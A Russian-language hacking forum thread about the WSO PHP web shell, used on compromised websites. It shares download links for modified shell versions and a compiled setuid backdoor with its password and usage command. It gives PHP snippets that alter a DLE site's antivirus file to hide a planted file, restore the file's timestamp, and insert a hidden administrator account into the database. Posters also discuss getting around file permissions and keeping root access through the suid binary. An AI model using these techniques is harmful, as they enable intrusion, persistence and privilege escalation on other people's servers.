Делал модификацию под себя, за основу взял последнюю версию WSO, и все же решил выложить, так как многим эта опция нужна. Добавлена опция дампа определенных колонок таблиц. Скриншот: Код на pastebin.com: http://pastebin.com/WvZTc46s
В WSO из первого поста есть ошибка в параметрах: Правьте) Готовый запакованный вариант: http://pastebin.com/7fn3hebC
Прошу больно не пинать, вопрос скорей не по шеллу, а по выполнению в шелле php скриптов.. Мне часто "попадаются" сайты на движке DLE, поэтому замутил для себя несколько простеньких скриптов для экономия времени.. Прячем файлы от встроенного антивируса: PHP: //AV hide $antivir = '../ajax/antivirus.php'; $time_create = filemtime($antivir); $text=file_get_contents($antivir); $file = fopen($antivir, 'w'); $text = str_replace('"./engine/inc/search.php",', '"./engine/inc/search.php", "./engine/ajax/view.php",', $text); fwrite($file, $text); fclose($file); $res=touch ( $antivir , $time_create ); echo "AV - ok :)"; // end // Создаём админа PHP: //adm ob_start (); define ("DATALIFEENGINE", "1"); include("../classes/mysql.class.php"); include("dbconfig.php"); include("config.php"); mysql_connect(DBHOST, DBUSER, DBPASS); mysql_select_db(DBNAME); @set_time_limit(0); $update = mysql_query("INSERT INTO `" . PREFIX . "_users` ( `email` , `password` , `name`, `user_group` ) VALUES ('my@mail.com', '14e1b600b1fd579f47433b88e8d85291', 'adm', '1')"); echo "adm in DB - ok :)"; // end // и много других... Как все эти скрипты реализовать в одном? Т.е. выполнился первый, если выдал результат "ок" - переходим ко второму и т.д. Если произошла ошибка - останавливаем и выводим на экран.. Знаю что реализуется условиями, но не пойму как сделать. Пых начал изучать недавно...
как отредактировать .htaccess через wso ? нехватает прав как быть какие есть варианты обхода помогите
ссылка сдохла! скиньте ещё раз Скомпилированный суидник плз! и появилась ещё проблемка,после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт! в чём может быть проблемма?
Самому не скомпилить чтоли? 1) Просто суидник: http://www.sendspace.com/file/hgwwez 2) Суидник собранный со -static: http://www.sendspace.com/file/gmeycj Пасс на судник: 112s233 Использование: ./suid 112s233 'uname -a; id'
да уже скомпилил! но вот следующий вопрос остаётся открытым! после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт! в чём может быть проблемма? серв до сих пор лежит!
Говоря на твоём языке - когда запускаешь суидник, (если он правильно настроен и туда закачен..) то ты получаешь рут, например, открываешь консоль, пишешь whoami, а те сервак отвечает www, ты юзаешь суидник, /bin/suid затем смотришь whoami, - root А суидник без рута просто не нужен, грубо говоря на то и суид - чтобы рута клепать)
Человеки добрые, подскажите в чём дело: На ломе прекрасно открывается данный шел из этой темы, только не работают Actions. Но не открывается вообще шел без модификации этой ( /thread103155-wso.html ) пишет про ошибку: "Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595
Когда я запускаю суидник он выполняется под владельцем. Но так как я его сам и залил, то никакого рута не получить.
В том то и дело, что всё в файле норм. Качаю прямо из топика автора, переименовываю, исправляю хеш пароля, заливаю на лом. Больше никаких исправлений не делаю
Простым смертным юзерам, www к примеру, не залить суидник в /bin/ т.к эта папка запрещена на запись, и нужно для начала сплойтом рутануть сервак, из под консоли (или сделать права), копирнуть суидник в /bin/ и затем запускать его чтобы получить рут, то есть чтобы не юзать каждый раз сплоит...
Так ты что хочешь то? Именно чтоб суидник работал под нужным тебе юзверем(ftp например), а не под веб-сервером? В таком случае нужно в коде суидника прописать uid и guid юзверя, а не рута(0). Можно еще настроить php как cgi/fcgi - тогда все скрипты будут работать от того же юзера, что и владелец файлов(обычно тот же, что и ftp и ssh твоего аккаунта).